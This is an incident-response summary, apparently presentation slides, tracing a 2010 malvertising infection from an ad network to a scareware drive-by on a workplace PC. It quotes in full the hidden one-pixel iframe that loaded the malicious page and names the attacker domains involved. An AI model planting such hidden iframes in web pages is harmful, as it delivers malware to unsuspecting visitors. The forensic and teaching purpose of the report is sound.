Infected PC Investigation Summary

6/8/10 infection

The story you are about to hear is true.

Only the names have been changed to

protect the innocent.

Hello,A user’s pc has been infected with a rogue antispyware called AV security Suite, keeps coming up with bogus viruses and basically has taken over the system. The network has been disconnected, the incident started yesterday 6/08/10, around 4:25 pm. User has access to level 2 protected info, but does not keep any of that info on her pc.Thanks,Tech Guy

• User visited legitimate, medical-dictionary.thefreedictionary.com

• Site served up advertising through interclick.com• One of the advertising pulls came from a known

"Malvertising" domain h7.ch.adtech.com.niklip.com. Malvertising domains serve up obfuscated JavaScript that redirects browsers to malware “check-in” sites.

• Immediately after this pull, a request was made to a known malware "check-in” site statsoplex.co.cc which returned a hidden iframe. Malware check-in sites redirect browsers to SEO (Search Engine Optimization) Exploit drive-by sites.

The iframe

<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe></body></html>

• The iframe loaded a scareware A/V page from a known SEO Exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malware JavaScript.

• Two seconds later, the JavaScript that came from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be an infected SWF. An infected PDF was also downloaded.

The Malware Distribution Site

• Reverse lookup on 188.65.x.x

• protect-ware.com

• "Antispyware Soft - Powerfull PC Protection !"

Interesting factoid

• All 4 of the above domains were registered within a month of the infection via a Chinese registrar, todaynic.com.

• Registrant addresses were in Lithuania, Russia, and Pennsylvania.

• IP addresses were in Austria, Belgium, Sweden

Another interesting factoid

• Study by Avast! (A/V software) found that for every 1 infected adult site there were 99 other legitimate sites that were infected.

Sites that are known to have been referring clients to malicious advertising services related to this incident

The PC

• XP SP3, fully patched• McAfee 8.7 with current engine and

signatures• Updated Adobe Reader

The Malware

• All JavaScript was obfuscated• The Payload was downloaded without user

interaction• Primarily scareware – attempted to convince

the user that Antivirus Soft could disinfect and protect her PC

• Pretty convincing Product image and System Tray icon. Would have fooled most users.

The Malware

• When the malware was uploaded to virustotal.com, only 3/41 products detected (McAfee did not detect)

• Next day, detection rate increased to 19/41, this time including McAfee

Results

• No indication from firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software

• PC was wiped, reloaded, and returned to the user